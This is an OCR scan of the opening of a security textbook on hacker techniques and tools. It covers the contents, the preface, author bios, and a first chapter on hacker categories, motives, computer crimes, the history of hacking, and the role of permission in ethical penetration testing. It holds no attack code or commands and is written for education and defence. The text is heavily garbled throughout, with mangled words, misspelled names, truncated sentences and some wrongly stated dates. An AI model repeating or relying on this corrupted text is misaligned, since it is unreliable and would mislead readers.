Locks 97 Lock Picking 97 Tokens and Biometrics 98 Avoiding Common Threats to Physical Security 99 Natural, Human, and Technical Threats 99 Physical Keyloggers and Sniffers 100 Wireless Interception and Rogue Access Points 102 Defense in Depth 102 CHAPTER SUMMARY 103 KEY CONCEPTS AND TERMS 1 03 CHAPTER 4 ASSESSMENT 104 part two A Tech nical Overview of Hacking 1 05 CHAPTER 5 Footp rm ting Tools and Techniques 106 The Information-Gathering Process 107 The Information on a Company Web Site 1 08 Discovering Financial Information 112 Google Hacking 114 Exploring Domain Information Leakage 117 Manual Registrar Query 117 Automatic Registrar Query 1 2 1 Whois 123 Nslookup 124 I nternet Assigned M u m bers Authority (I AN A) 1 24 Determining a Network Range 126 Tracking an Organization’s Employees 128 Exploiting Insecure Applications 132 Using Basic Countermeasures 1 32 CHAPTER SUMMARY 135 KEY CONCEPTS AND TERMS 1 35 CHAPTER 5 ASSESSMENT 136 CHAPTER 6 Port Scanning 137 Deter rn i n i ng the N etwo rk Range 138 I d enti fy i ng Active Machines 133 Wardiafing 139 Wardriving 140 Pinging 142 Port Scanning 142 Contents CHAPTER 7 Mapping Open Ports 146 Nmap 146 Superscan 149 Scanrand 149 THC-Amap 1 50 OS Fingerprinting 1 BO Active OS Fingerprinting 1 51 Passive OS Fingerprinting 1 53 Mapping the Network 1 54 Cheops 155 Solarwinds 155 Analyzing the Results 1 55 CHAPTER SUMMARY 157 KEY CONCEPTS AMD TERMS 157 CHAPTER 6 ASSESSMENT 15S Enumeration and Computer System Hacking 159 Windows Basics 160 Controlling Access 161 Users 161 Groups 162 Security Identifiers 1 63 Commonly Attacked and Exploited Services 1 64 Enumeration 164 NULL Session 165 Working with Mbtstat 167 SuperScan 1 67 SNScan 169 System Hacking 169 Types of Password Cracking 170 Passive Online Attacks 1 70 Active Online Attacks 171 Offline Attacks 171 N o ntech n ica I Attacks 1 74 Using Password Cracking 1 75 Privilege Escalation 175 Planting Backdoors 1 79 Using PsTools 1 80 Rootkits 180 Contents Covering Tracks 182 Disabling Auditing 1 82 Data Hiding 183 CHAPTER SUMMARY 184 KEY CONCEPTS AND TERMS 184 CHAPTER 7 ASSESSMENT 185 NiUj^ll Wireless Vulnerabilities 186 The I mpo rta nee of Wi re le ss Security 1 8 7 Emanations 188 Common Su pport and Ava ilability 188 A Brief History of Wireless Technolog i es 1 89 802.11 190 802.11b 190 802.11a 190 802.11 g 191 802.11 n 191 Other Wire less Tech nol og ies 1 92 Wo rk i n g w ith an d Se-cu rin g Bluetooth 1 92 Bluetooth Security 193 Working with Wireless LANs 196 CSMA/CD Versus CSIvWCA 1 96 RoleofAPs 197 Service Set Ida ntifier (SS ID) 197 Associati on w ith a n AP 198 Th e I mp-o rtan ce of Authentication 1 98 Working with RADIUS 198 Network Setup Options 1 98 Threats to Wireless LANs 199 Wardriving 199 Mis configured Security Settings 200 Unsecured Connections 200 Rogue APs 201 Promiscuous Clients 201 Wireless Network Viruses 202 Countermeasures 202 Wireless Hacking Tools 202 Netstumbler 201 inSSIDer 203 Protectin g Wi reless N et wo rks 205 Default AP Security 205 Placement 205 Emanations 205 Rogue APs 206 Use Protection for Transmitted Data 206 MAC Filtering 207 CHAPTER SUMMARY 207 KEY CONCEPTS AND TERMS 208 CHAPTER 8 ASSESSMENT 20fi Web and Database Attacks 209 Attacking Web Serve rs 210 Categories of Risk 211 Vu Inerabil iti es of Web Servers 2 1 2 I rn p rope r o r Poor Web Des ign 212 Buffer Overflow 213 Denial of Service (DoS) Attack 213 Distributed Denial of Service (DDoS) Attack Banner Information 214 Permissions 215 Error Messages 215 Unnecessa ry Features 2 1 5 User Accounts 216 Structured Query Language (SQL) Injections Examining an SQL Injection 217 Vandalizi ng Web Servers 2 1 S Input Validation 219 C ross^S ite Scripting (XS S) 219 An atomy of Web Applications 2 20 Insecure Logon Systems 221 Scripting Errors 222 Session Management Issues 223 E ncry ption Wea knesses 223 Database Vulnerabilities 224 A Look at Databases 225 Vulnerabilities 226 Locating Databases on the Network Database Server Password Cracking Locating Vulnerabilities in Databases 0 ut of Sight, Out of Mind 229 CHAPTER SUMMARY 230 KEY CONCEPTS AMD TERMS 230 CHAPTER 9 ASSESSMENT 231 226 228 228 Contents CHAPTER 10 Ma I ware, Worms, and Viruses Ma I wa re 233 Mia I ware’s Legality 235 Types of Ma I ware 236 Ma I ware’s Targets 236 Viruses and How They Function 237 Viruses: A History 237 Types of Viruses 238 Prevention Techniques 241 Worms a nd How They Function 2 43 How Worms Work 2 44 Stopping Worms 245 The Power of Education 246 Antivirus and Firewalls 246 Spyware 246 Methods of Infection 247 B undl in g with Sof t wa re 2 48 Adware 248 Sea re ware 249 CHAPTER SUMMARY 250 KEY CONCEPTS AND TERMS 251 CHAPTER 10 ASSESSMENT 251 232 CHAPTER 11 Trojans and Backdoors 252 Si g n if ica nee of Troj ans 254 Methods to Get Troj ans onto a System Targets of Troja n s 258 Known Symptoms of an Infection 2S9 Detect on of Troja ns a nd Viruses 2 59 Vulnerability Scanners 261 Antivirus 261 Trojan Tools 262 An In Depth Look at B02K 263 Distribution Methods 265 Using Wrappers to Install Trojans 265 Trojan Construction Kits 266 Backdoors 267 Covert Communication 268 The Role of Keyloggers 269 Software 270 Port Redirection 270 Software Protection 272 256 Contents CHAPTER 12 CHAPTER SUMMARY 274 KEY CONCEPTS AND TERMS 274 CHAPTER 11 ASSESSMENT 275 Sniffers, Session Hijacking, and Denial of Service Attacks Sniffers 277 Passive Sniffing 279 Active Sniffing 280 Sniffing Tools 284 What Can Be Sniffed? 284 Session Hijacking 285 Identifying an Active Session 2S6 Seizing Control of a Session 288 Session H ijack i ng Too Is 289 Thwarting Session Hijacking Attacks 289 Denial of Service [DoS) Attacks 289 Categories of DoS Attacks 290 Tools for DoS 292 D istributed Den ial of Service (DDoS) Attacks 293 Some Characteristics of DDoS Attacks 293 Tools for DDoS 295 Botnets 295 CHAPTER SUMMARY 297 KEY CONCEPTS AMD TERMS 297 CHAPTER 12 ASSESSMENT 298 CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools Linux 300 A Look at the Interface 302 Basic Linux Navigation 302 Important Linux Directories 304 Users, Groups, and Special Accounts 304 Working with Permissions 305 Commonly Used Commands 307 Basic Command Structure 307 I pcfra ins and Iptabl es 309 Ipchains 309 IPtables 310 299 Contents Live CDs 310 5 peci a I Pu rpose Li ve CDs 3 1 2 Trinity 312 Caine 313 Astaro 313 Damn Vulnerable Linux 313 Network Security Toolkit (NST) 313 Auto ma ted Assessm en t Too Is 314 So urce C ode Scanners 314 Application Level Scanners 31 5 System-Level Scanners 316 CHAPTER SUMMARY 317 KEY CONCEPTS AND TERMS 317 CHAPTER 13 ASSESSMENT 318 part three Incident Response and Defensive Technologies 319 Incident Response 320 What Is a Security Incident? 321 The Incident Response Process 322 Incident Response Policies, Procedures, and Guidelines 323 Phases of an Incident and Response 324 I ncf dent Response Team 324 Incident Response Plans (IRPs) 327 Th e Ro le of B us i ness Conti nuity Plans (8CPs) 32 7 Recovering Systems 330 Business Impact Analysis 331 Planning for Disaster and Recovery 332 Preparation and Staging of Testing Procedures 333 Frequency of Tests 334 Ana lys is of Test Res ults 334 Evidence h a ndling a nd Ad m i n istratio n 335 Evidence Collection Techniques 335 Security Reporting Options and Guidelines 339 Affected Party Legal Considerations 340 Requ i reme nts of Regulated i ndu str ies 34 1 Payment Card Industry Data Security Standard (PCI DSS) 341 CHAPTER SUMMARY 342 KEY CONCEPTS AND TERMS 343 CHAPTER 14 ASSESSMENT 343 Contents De f en si v e Tec hno I og i es 344 Intrusion Detection Systems (IDSs) 345 IDS Components 349 Components of NIDS 350 Components of HIDS 352 Setting Goals 352 Accountability 353 Li mita tions of an IDS 353 Investigation of an Event 354 Analysis of Information Collected 354 Intrusion Prevention Systems (IPSs) 354 Trie Purpose of Firewalls 355 How Fi rewalls Work 3 56 Firewall Methodologies 356 Limitations of a Firewall 357 Implementing a Firewall 358 Authoring a Firewall Policy 360 Honeypots/Honeynets 362 Goals of Honeypots 363 Legal Issues 363 Role of Controls 364 Administrative Controls 364 Technical Controls 365 Physical Controls 367 CHAPTER SUMMARY 368 KEY CONCEPTS AND TERMS 369 CHAPTER 15 ASSESSMENT 369 APPENDIX A APPENDIX B Answer Key 371 Standard Acronyms 373 Glossary of Key Terms 375 References 383 Index 337 Preface Purpose of This Book This book is part of the Information Systems Security & Assurance Series from Jones & Bartlett Learning ( w ww. jblea rn ing. co m } . Designed for courses and curriculums in IT Security, Cybersecurity, Information Assurance, and information Systems Security, this series features a comprehensive, consistent treatment of the most current thinking and trends in this critical subject area. These titles deliver fundamental information- security principles packed with real-world applications and examples. Authored by f LTiiiied I n formation Sysiems Security I’roti-sslimnl.s (t’lSSl’sj. ihe\ deliver com prHiensk’e information on all aspects of information security. Reviewed word for word by leading technical (.’N pi’ i” 1 s in the field, these books are not jl:se cur rem. hul t”or\varti-i JTinkltiy, putting you in the position to solve the cybersecurity challenges not just of today, but of tomorrow, as well. The first part of this book on information security examines the landscape, key terms, and concepts that a security professional needs to know about hackers and computer criminals who break into networks, steal information, and corrupt data. It covers the history of hacking and the standards of ethical hacking. The second part examines the technical overview of hacking: how attacks target networks and the methodology they follow. It reviews the various methods attackers use, including footprinting, port scanning, enumeration, ma I ware, sniffers, and denial of service. The third part reviews incident response and defensive technologies: how to respond to hacking attacks and how to fend them off, especially in an age of increased reliance on the Web. Learning Features The writing style of this book is practical and conversational. Each chapter begins with a statement of learning objectives. Step-by-step examples of information security concepts and procedures are presented throughout the text. Illustrations are used both to clarify the material and to vary the presentation. The text is sprinkled with Notes, Tips, FYIs, Warnings, and sidebars to alert the reader to additional helpful information related to the subject under discussion. Chapter Assessments appear at the end of each chapter, with solutions provided in the back of the book. ■ – ■ XIII Preface Chapter summaries are included in the text to provide a rapid review or preview of the material and to help students understand the relative importance of the concepts presented. Audience The materiel! is suitable tor undergraduate or graduate computer science majors or in form at ion science majors, students at a two-year technical college or community college who have a basic technical background, or readers who have a basic understanding of IT security and want to expand their know led ye. Acknowledgments Thanks to Mom and Dad for all your help over the years. Thanks to Heather for all your hard work and keeping me on task. Every author should be so fortunate to have you helping them. And Ei very special thanks to Jennifer. Thank you for your support mid encouni^ernent, and for acting interested in the topics that this geek would yak about for too long. FN always appreciate and love you more than words can express. Thanks for being the Zelda to my Link, St\u-i > }}\ l iip i > : J j r J i J i XV About the Authors SEAN-PHILIP ORIYANO has been actively working in the IT field since 19 90. Throughout his career, he hits held positions such as support specialist to consultants and senior instructor, Currently, he is an IT instructor who specializes in infrastructure and security topics for various public and private entities. Oriyano has instructed for the 11 S. Air Force. Navy, and Army at locations both in North America and internationally. Sean is certified as a CISSP, CHFI. CEH, GET. CNDA. SCNP. SCPI, MCT, MCSE, and MCITP, and he is a member of the EC-Council ISSA. the Elearning Guild, and Infragard, MICHAEL GREGG brings more than 20 years of experience building real security solutions and driving strategic development. He is a cybersecurity expert focused on IT networks and security assessments. His written works in J he iield of IT security include authoring or coauthoring 14 security books. Some of these titles include: I hick the Stuck (Syngress): Security Street Smarts (Sybex); CISSP Exam Cram 2, CISSP Exam Cram 2 Questions Edition, and The Certified Ethical Hacker Exam Prep 2 (Que). He also authored Inside Network Security Assessment (Sams Publishing), Ruild Your Own Network Security Lab (Wiley), and The Certified Information Security Auditor ( CISA j Exam Prep (Que). Gregg holds two tissue Lille’s decrees, a haehdurV decree, and master’s degree, Hacker Techniques and Tools chapter i Hacking: The Next Generation 2 CHAPTER 2 TCP/IP Review 23 CHAPTER 3 Cryptographic Concepts 50 chapter 4 Physical Security 81 Hacking: The Next Generation THIS BOOK WILL COVER A WIDE RANGE of techniques and technologies that hackers can use to compromise a system in one way or another Before you go further, it is important to first understand what hackers are and where they come from. The first generation of hackers who emerged in the 1960s were individuals who would be called “geeks” or technology enthusiasts today. These early hackers would go on to create the foundation for technologies such as the ARPANET which paved the way for the Internet. They also initiated many early software-development movements that led to what is known today as open source. Hacking was motivated by intellectual curiosity; causing damage or stealing information was “against the rules” for this small number of people. In the 1980s, hackers started gaining more of the negative connotations by which the public now identifies them. Movies such as War Games and media attention started altering the image of a hacker from a technology enthusiast to a computer criminal During this time period, hackers engaged in activities such as theft of service by breaking into phone systems to make free phone calls, The publishing of books such as The Cuckoo’s Egg and the emergence of magazines such as Phrack cast even more negative light on hackers. In many respects, the 1980s formed the basis for what a hacker is today. Over the past two decades, the definition of what a hacker is has evolved dramatically from what was accepted in the 1980s and even the 1990s. Current hackers defy easy classification and require categorization into several groups to better match their respective goals. Here is a brief look at each of the groups to better understand what the information technology industry is dealing with: 1 • Script kiddies — These hackers occupy the lowest level of the hacker hierarchy. They typically possess very basic skills and rely upon existing tools that they can locate on the Internet These hackers are the beginners and may or may not understand the impact of their actions in the larger scheme of things. It is important, however, not to underestimate the damage these individuals can cause; they can still do a great deal of harm. White-hat hackers — These individuals know how hacking works and the danger it poses, but use their skills for good. They adhere to an ethic of “do no harm/’ White-hat hackers are sometimes also referred to as ethical hackers, which is the name most widely known by the general public, Gray-hat hackers — Hackers in this class are “rehabilitated” hackers or those who once were on “the dark side/’ but are now reformed. For obvious reasons, not all people will trust a gray-hat hacker Black-hat hackers — A black-hat hacker has, through actions or stated intent, indicated that his or her hacking is designed to break the law r disrupt systems or businesses, or generate an illegal financial return. Hackers in this class should be considered to be “up to no good/’ as the saying goes. They may have an agenda or no agenda at alL In most cases, black-hat hackers and outright criminal activity are not too far removed from one another The purpose of this book is to teach you how to ensure the security of computers and networks by learning and understanding the mindset of individuals out to compromise those systems. To defend information technology assets, you need to understand the motivations, tools, and techniques that attackers commonly use, Chapter 1 Topics This chapter covers the following topics and concepts: What the profiles of hackers, crackers, and cybef criminals are • What a look back at the history of computer hacking shows • What ethical hacking and penetration testing are What common hacking methodologies are ■ How to perform a penetration test • What the roles of ethical standards and the law are 3 Chapter 1 Goals When you complete this chapter, you will be able to: • Describe the history of hacking • Explain the evolution of hacking • Explain why information systems and people are vulnerable to manipulation • Differentiate between hacking, ethical hacking, penetration testing, and auditing • Relate the motivations, skill sets, and primary attack tools used by hackers • Compare the steps and phases of a hacking attack to those of a penetration test • Explain the difference in risk between inside and outside threats and attacks • Review the need for ethical hackers • State the most important step in ethical hacking • Identify important laws that relate to hacking Profiles of Hackers, Crackers, and Cybercriminals In today’s world, organizations have quickly Learned that they can no Longer afford to muleiTsljmatL? or ignore the Eh rem al NiduTH pose. Origan mi Lams of till sizes hiwc Jeanied to reduce threats through a combination of technological, ad in in is t rati ve h and physical measures designed to address a specific range of problems. Technological measures include devices and techniques such as virtual private networks l VPN si. cryptographic protocols, intrusion detection systems (IDS), intrusion prevention systems (IPS), access control lists ( ACLs), biometrics, smart cards, and other devices. Administrative controls include H ™ U People who break the law or break into systems without authorization are more correctly known as “crackers.'” The press does not usually make this distinction, because- “hacker” has become such a universal term. However, there are many experienced hackers who never break the law r and who define hacking as producing an outcome the system designer never anticipated. In that respect, Albert Einstein can be considered to have “hacked” Newtonian physics. In the interest of simplicity this book will use the term “hacker” to describe those who are either good or evil. No offense is intended to either group. CHAPTER 1 Hacking: The Next Generation 5 pi. iJ ides, procedures, and olber rules. Physical measures include devices such as cable locks, dei r ice locks, alarm systems, and other similar devices. Keep in mind that each of these devices, even if expensive, can be cheaper and more effective than cleaning up the aftermath of an intrusion. While discussing attacks and attackers, security professionals must be thorough in assessment and evaluation of the threat by also considering where it comes from. When evaluating the threats against an organization and possible sources of attack, always consider the fact that attackers can come from both outside and inside the organization. A single disgruntled employee can cause tremendous amounts of damage because he or she is an approved user of the system. In just about any given situalion, Lhe attacks originating fro in fiutsuii 1 the firewall will greatly outnumber the attacks that originate from the inside. However, an insider may go unnoticed longer and also have some level of knowledge of how things work ahead of time, which can result in a more effective attack. Because the risk to any organization is very real, it is up to each organization to determine the controls that will be most effective in reducing or mitigating the threats it faces. When considering controls, you can examine something called the TAP principle of controls, TAP is an acronym for technical, adminis- trative, and physical!, the three types of controls you can use in risk mitigation. Here’s a look at each type with a few examples: • Technical — Technical controls take the form of software or hardware such as iire walls, proxies, intrusion detection systems (IDS), intrusion prevention systems (IPS), biomclrie authentication, permissions, auditing, and sim ilar technologies. • Administrative — Administrative controls take the form of policies and procedures. An example is a password policy that defines what makes a good password. In numerous cases, administrative controls may also fulfill legal requirements, such as policies that dictate privacy of customer information. Other examples of administrative policy include the rules governing the hiring and firing of employees. • Physical — Physical controls are those that protect assets from traditional threats such as theft or vandalism. Mechanisms in this category include locks, cameras, guards, lighting, fences, gates, and other similar devices, • NOTE Never underestimate the damage a determined individual can do to computer systems, For example, Michael Cake,, commonly known as MafiaBoy, was an individual who In February 2000 launched a series of denial of service (Do 5) attacks that were responsible for causing damages estimated upwards of$1 .2 bit! ion.

NOTE

Both insiders and outsiders
rely on exploits of some type.
Remember that an exploit refers
to a piece of software, a toolj or
a technique that targets or takes
toss of integrity, or denial of
service on a computer system.

6

PA RT 1 H ac ke r Techn iq ties and Too I s

The Hacker Mindset

NOTE

Like many criminals, black -hat hackers do not consider their activities to be illegal or
even morally wrong. Depending on whom you ask, you can get a wide range of responses
from hackers on how they view [heir actions. It Ik also not unhenrd of for hackers or
criminals to have a code of ethics that they hold sacred, but seem more than a little

skewed to others. In defense of their actions, hackers have been
known to cite all sorts of reasons, including the following:

Although it is true that the mere
act of writing a computer virus
is not illegal, releasing it into
the “wild” is illegal.

NOTE

Although it is true that
applications or data can be
erased or modified, worse
scenarios can happen under the
right circumstances. For example,
consider what could happen
if someone broke into a system
such as a 911 emergency
service and then maliciously
or accidentally took it down.

• The no -ha r m – was-d one fallacy — If one enters a system,
even in an unauthorized manner it is OK as long as
nothing is stolen or damaged in the process.

The computer game fallacy — If the computer or system
did not take any action or have any mechanism to stop
the attack, it must be OK.

• The law-abiding citizen fallacy — Writing a virus
is not illegal, so it must be OK.

The shatterproof fallacy — Computers cannot do any
real harm. The worst that can happen is a deleted file
or erased program .

• The candy- from- a -baby fallacy — If it is so easy to copy
• The hacker fallacy — Information should be free. No one
should have to pay for books or media. Everyone should
have free access.

• Another example of attempting to explain the ethics applied to hackers is known as
the hacker ethic. This set of standards dates to Steven Levy in the 1960s, In the preface
of his book, Hackers: Heroes of the Computer Revolution, Levy stated the following:

the way the world works should be unlimited and total.

• All information should be free.

• Authority should be mistrusted, and decentralization should be promoted,

• Hackers should be judged by their hacking, not criteria such as degrees,
age, race, gender h or position,

• You can create art and beauty on a computer,
L’omputerfi can change your life for the better.

CHAPTER 1 Hacking: The Next Generation

!■ lilies are an important component in understanding what makes a hacker, but far
from the only component. One must also consider motivation. Anyone who has watched
ei police drain a or is a fan of detective stones knows that there are three things needed
to commit a crime:

• Mea ns — Doe s the attacker pos sess the ability to commit the crime in q uestio n ?

■ Motive — Does the attacker have a reason to engage in the commission of the crime?

Opportunity — Does the attacker have the necessary access and time to commit
1 he crime?

Focusing on the second point — motive — helps better understand why an attacker might
engage in hacking activities. The early “pioneers” of hacking engaged in those activities
out of curiosity. Today’s hackers can have any number of motives, many of which are
similar to those for traditional crimes:

• Monetary — Attacks committed with the Intention of reaping financial gains.

Status — A t tacks com m i 1 1 ed w i t h th e in te a tio n o f ga i ni n g r ec ogn it io n a n d , by

extension, increased credibility within a given group (for example, a hacking group).

• Terrorism — Attacks designed to scare, intimidate, or otherwise cause panic
in the victim or target group.

Revenge or grudge — Attacks conceived and carried out by individuals who are
angry at an organization. Attacks of this nature Eire often launched by disgruntled
employees or customers,

Hacktivism — Attacks that are carried out to bring attention to a cause, group,
or political ideology.

• Fun — A ttacks that are launched with no specific goal in mind other than to just
carrv out an attack. These attacks can he indiscriminate in their execution.

No matter what the hackers’ motivations are, any of them might result in the commission
of a computer-based crime. Tor example, attackers may htiek a game server to boost their
stats in an online game against their friends, but they still have entered a server without
authorization,

Hacktivism

A relatively new form of hacking is the idea of hacking in behalf of a cause. In the past r
hacking was done for a range of different reasons that rarely included social expression.
Over the past decade, however, there have been an increasing number of security incidents
with roots in social or political activism. Examples include defacing Web sites of public
officials, candidates, or agencies that an individual or group disagrees with, or performing
DoS attacks against corporate Web sites.

PART 1 Hacker Techniques and Tools

A sampling of common attacks that lit the definition of computer crime include
the following:

Theft of access — Stealing, pels swords, stealing usernames, and subverting access
mechanisms to bypass normal authentication. In a number of situations, the very
act of possessing stolen credentials such as passwords may be enough to bring
formal charges.

Network intrusions — Accessing a system of computers without authorization.
Intrusions may not even involve hacking tools; the very act of logging into
a guest account may be sufficient to be considered an intrusion.

Emanation eavesdropping — Smiling devices for intercepting radio frequency IRF)
signals gen untied by computers or terminals. Years ago. I he U.S. Depart men! of
Defense established a classified program codenamed TEMPEST that was designed
to shield or suppress electronic emanations to protect sensitive and classified
government information.

• Social engineering — Basically, telling lies to manipulate people into divulging
information they otherwise would not provide. Information such as passwords.
PINs (personal identification numbers ), or other delaiis can be used to attack
computer-based systems. Although not necessarily a crime in every specific
situation, social engineering methods such as pretexting (tricking an individual
to reveal information under false pretenses) are often Illegal.

• Posting and/or transmitting illegal material— Distributing pornography to minors
is illegal in numerous jurisdictions, as is possessing or distributing child pornography.

• Fraud — Intentional deception designed to produce illegal financial gain or to damage
another party.

Software piracy — The possession, duplication, or distribution of software
in violation of a license agreement, or the act of removing copy protection

Dump ste r d i vi n g — G a th ering m a teri a I th a t h a s bee n di sc arded or I eft in u nse c u red
or unguarded receptacles. Dumpster diving often enables discarded data to be pieced
loueiJuT to reeonsinm setiMLiu 1 inJurmiU ion.

• Malicious code — Software written with a de liber ate purpose to cause damage* destruc-
tion, or disruption. Examples Include viruses, worms, spy ware, and Trojan horses.

Denial of service (DoS) and distributed denial of service (DDoS) attacks —

Both DoS and DDoS have the same effect, except thai distributed denial of service
(DDoS) is launched from large numbers of hosts that have been compromised and
act after receiving a particular command.

traffic or a message to disguise the true location of the message or person. This
attack method may a 1st? be used as a component of other larger Eit tacks such as
DoS or DDoS attacks.

CHAPTER 1 Hacking: The Next Generation

Unauthorized destruction or alteration of information — Modifying, destroying,
or tampering with information wilbonl appropriate permission. This can involve
manual or automated tools that have been developed for this purpose In change
information til rest or in motion,

• Embezzlement — A form of financial fraud that involves theft or redirection
of funds as a result of violating a position of trust,

• Data-diddling — The unauthorized modification of data used to forge or counterfeit
information. Examples include changing performance review marks, adjusting
expense account limits, or “tweaking” reports after the fact.

■ Logic bomb — A piece of code designed to cause harm, a logic bomb is intentionally
inserted into a software system and will activate upon the occurrence of some
predetermined data, time, or event.

A Look B ack at th e Histor y of Compute r Hacking

Typical early hackers were technology enthusiasts who were curious ah out the new
technology of networks and computers and wanted to see just how far they could push
its capabilities. In the decades since, hacking has changed quite a bit — getting more
advanced and cleverer as the technology advanced. For example, in the 1970s* when
mainframes were more common in corporate and university environments, hacking was
mostly confined to those systems. The 1980s saw the emergence of personal computers
(PCs), which meant every user had a copy of an operating system. As these systems were
very similar, a hack that worked on one machine would work on nearly every other PC
as welL Although the first Internet worm in November 1988 exploited a weakness in the
UNIX sendmai I command, worm and virus writers moved their attention to the world
of PCs, where most infections occur today.

As h tickers evolved so did their attacks as their skills and creativity increased. The
lirst World Wide Web browser. Mosaic, was introduced in 199 3. By 199 5, hackers began
defacing Web sites. Some of the earliest hacks were quite funny, if not somewhat offensive
or vulgar. In August 199 5. hackers hacked The MCSM Web site for the movie “T I ackers”
suggesting readers attend the DEFCON hacker conference instead, A 1996 hack of the
Department of justice Web site replaced Attorney General Janet Reno’s picture with I hat
of Adolf Hitler. The next month, hackers defaced the CIA Web site, and later that year
the Air Force Web site featured a link to Area 51 , a secret government site in Nevada,
long linked in the popular mind to IJFOs. By May 2001 , Web sites were being hacked at
such a rate that the group that documented them gave up trying to keep track (see htip’Jl
a ttri tion.G rg/m ir ror/attrit ion / } ,

By the turn of the century, hacks started to progress from pranks to maliciousness.
DoS attacks took out companies 1 Internet access, affecting stock prices and causing
fin a nciul damage. As \ eh ^Lles heiian to process more credit cEird transactions,
their back-end databases became prime targets for attacks. As computer-crime laws
came into being, the bragging rights for hacking a Web site became less attractive —
sure, a hcicker could show off to friends, but that didn’t produce a financial return.

PA RT 1 Hacker Techniques and Tools

Willi online commerce,, skills stEirted going to the highest bidder, with crime rings,
organized crime, and nations with hostile interests utilizing the Internet as an
attack route.

Numerous products emerged in the 1990s and early 2000s — antivirus, firewalls,
intrusion detection systems, and remote access controls — each designed to counter
an increasing number of new and diverse threats.

As technology, hackers, and counter measures improved and evolved, so did the types
of attacks and strategies that initially spawned them. As is true in the security field
and the technology field as a whole, new developments move rapidly, and old defensive
measures lose l heir effect iv eness n> lime inarches on, Attackers sinned introducing new
threats in the form of worms, spam, spy ware, ad ware, and rootkits. These attacks went
beyond harassing and irritating the public: they also caused widespread disruptions
by attacking the technologies that society increasingly depended on.

II tickers also started to realize that it was possible to use their skills to generate money
in all sorts of interesting ways. For example, attackers have used techniques to redirect
Web browsers to specific pages that generate revenue for themselves. Another example
is a spammer sending out thousands upon thousands of e-mail messages that advertise
a product or service. Because sending out bulk e-mail costs mere pennies, it takes only
a small number of purchasers to make a nice profit

Keep in mind that in the security iield. there is an ongoing battle between attacker
and defender to establish dominance. Attackers change their tactics in an effort to keep
their attacks as fresh and effective as possible, while defenders improve and adapt their
defenses U’ counter ibe nllacks as we\ as anticipate and lire. ; i r l new ones.

Over the past few years, the hacking community has adapted a new team ethic or
work style. In the past, it was normal for a ‘”lone wolf” type to engage in hacking activities.
Over the last few years, there is a new pattern of collective or group effort. Attackers have
found that working together can provide greater results than one individual carrying
out an attack alone. Such teams increase their effectiveness not only by sheer numbers,
diversity, or complementary skills, but also by adding clear leadership structures. Also of
concern is the very real possibility that a given group of hackers may be receiving financing
from nefarious sources such as criminal organizations or terrorists, The proliferation of
technology and increasing dependence on it has proved an irresistible target for criminals.

Security and technology professionals are on the front lines and as such must be
aware of and deal with increasingly complex crimes. One of the biggest challenges
security professionals face is staying current on the latest technologies, trends, and threats
that appear in an ever-changing landscape. To be effective, security professionals must
continually expand their understanding of many diverse but related areas such as ethical
hacking, ethics, legal issues, cybercrime, forensic techniques, incident response, and
other technologies.

Additionally, security professionals must strive to understand the reEisons and
motivations behind the hacker or criminal mindset Understanding the motivations
can, in some cases, yield valuable insight into why a given attack has been committed
or may be committed.

CHAPTER 1 Hacking: The Next Generation

11

In the 1960s, Intel scientist Gordon Moore noted that the density of transistors was doubling
every IS to 24 months. Since computing power is directly related to transistor density, the
statement “computing power doubles every 18 months”‘ became known as Moore’s Law.
Cybersecurity author and expert G. Mark Hardy has offered for security professionals a corollary
known as G. Mark^ Law: “Half of what you know about security will be obsolete in 18 months.”
Successful security professionals commit to lifelong learning.

As stated earlier* hacking is by no means a new phenomenon; instead it has existed
in one form or another since the 1960s. It is only for a portion of the time since then
that hacking has been viewed as a crime and situation that must be addressed.

Here’s a look at some famous hacks over time:

In 1988, Cornell University student Robert T. Morris Jr. created what is considered
to be the first internet worm. According to Morris, his worm was designed to count
the number of systems connected to the Internet. Due to a design flaw, the worm
replicated quickly and indiscriminately, causing widespread slowdowns across the
globe. Morris was eventually convicted under the 1986 Computer Fraud and Abuse
Act and was sentenced to community service in lieu of any jail time. (Interestingly,
his father Robert Morris Sr.. was the chief scientist of the National Security Agency
at the time).

• In December 1999. David L. Smith created the Melissa virus, which was designed

to e-mail itself to entries in a user s address book and later delete files on the infected
system. Smith was convicted on charges of computer fraud and theft of services,
and served 20 months in prison as well as being ordered to pay $5,000 in fines and penalties for the damages he caused. In February 200 1 , Jan de Wit authored the Anna Kournikova virus, which was designed to read all the entries of a user’s Outlook address book and e-mail itself out to each. De Wit was ultimately sentenced to 150 hours of community service and 7 5 days in jail. • In December 2004, Adam Botbyl and two friends conspired to steal credit card information from the Lowe’s hardware chain. The three were charged with several counts of theft and fraud, but ultimately only Botbyl served any time, • In September 2005, Cameron Lacroix (nickname “carnO” ) hacked into the phone of celebrity Paris Hilton and also participated in an attack against the site LexisNexis, an online public record aggregator ultimately exposing thousands of personal records. Mr. Lacroix was charged with computer fraud and was sentenced to 11 months in a juvenile detention facility as a result of his actions. • NOTE People have written worms and viruses over the years for any number of reasons, Some reasons for creating malicious code have included curiosity, monetary gain, ego, thrill seeking, desire for fame, and revenge; and in a handful of cases to impress, or get revenge agaEnst, a former lover. 12 PART 1 Hacker Techniques and Tools The previous examples represent some of the higher-profile incidents that have occurred, but for every news item or story that makes it into the public consciousness, many more never do. For every hacking incident that is made public, only a small portion of perpetrators are caught, and an even smaller number ever gel prosecuted for cybercrime. In any case, hacking is indeed a crime, and engaging in such activities can he prosecuted under any number of laws. The volume, frequency, and seriousness of attacks have only increased and will continue to do so as technology evolves even more. Ethical Hacking and Penetration Testing As a security professional, two of the terms you will encounter early on are ethical hacker and penetration testing. Today’s security community includes different schools of thought on what constitutes each. It’s important to separate and clarify these two terms to understand each and where they fit into the big picture. Engaging in any hacking activity without the explicit permission of the owner of the target you are attacking is a crime, whether tjon get caught or not. From everything discussed so far, you might think that hacking is not something you can engage in legally or for any benign reason whatsoever, but this is far from the truth. It is possible to engage in hacking for good reasons (for example, when a network owner contracts with a security professional to hack systems to uncover vulnerabilities that should be addressed). Notice the important phrases “network owner contracts” and ” explicit permission”: Ethical hackers engage in their activities only with the permission of the asset owner. Once ethical hackers have the necessary permissions and contracts in place, they can engage in penetration testing, which is the structured and methodical means of investigating, uncovering, atl ticking, and reporting on a target system’s strengths and vulnerabilities. Under the right circumstances, penetration testing can provide a wealth of information that the system owner can use to adjust defenses, Penetration testing can take the form of black -box or white-box testing, depending on what is being evaluated and what the organization’s goals are. Black-box testing Is in l “S1 often used v, Jien an organmilmn UTinls lo closely simulate how an tut acker views a system, so no knowledge of the system is provided to the testing team. In white-box testing, advanced knowledge is provided to the testing team. In either case, an attack is 